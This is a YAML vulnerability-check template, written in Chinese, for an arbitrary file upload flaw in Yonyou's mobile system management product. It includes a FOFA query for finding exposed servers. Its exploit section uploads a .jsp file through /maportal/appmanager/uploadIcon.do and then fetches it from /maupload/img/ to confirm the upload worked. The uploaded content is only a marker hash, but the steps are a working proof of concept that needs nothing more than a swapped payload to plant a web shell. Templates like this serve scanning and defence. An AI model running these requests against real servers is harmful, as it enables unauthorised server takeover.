product: 用友移动系统管理
vName: 用友移动系统管理 uploadIcon任意文件上传
type: 文件上传
vID: [ ]
level: 3
vDesc: 用友移动系统管理是用友公司推出的一款移动办公解决方案，旨在帮助企业实现移动办公、提高管理效率和员工工作灵活性。它提供了一系列功能和工具，方便用户在移动设备上管理和处理企业的系统和业务。该产品存在任意文件上传，攻击者可通过此漏洞获取服务器权限。
version: ''
note: ''
search:
  FOFA: app="用友-移动系统管理"
protocol: http
link: https://blog.csdn.net/qq_53003652/article/details/135439135
fix:
  - 建议联系软件厂商进行处理。
model: ''
logic: and
exploit:
  - exp:
      method: post
      follow: false
      path: /maportal/appmanager/uploadIcon.do
      file:
        iconFile:
          - 52e039302a62d077.jsp
          - 95cc64dd2825f9df13ec4ad683ecf339
          - application/msword
    verify:
      path: ''
      logic: and
      check:
        - status: 200
          body:
            value:
              - '"status":2'
            logic: and
  - exp:
      method: get
      follow: false
      path: /maupload/img/52e039302a62d077.jsp
    verify:
      path: ''
      logic: and
      check:
        - status: 200
          body:
            value:
              - 95cc64dd2825f9df13ec4ad683ecf339
            logic: and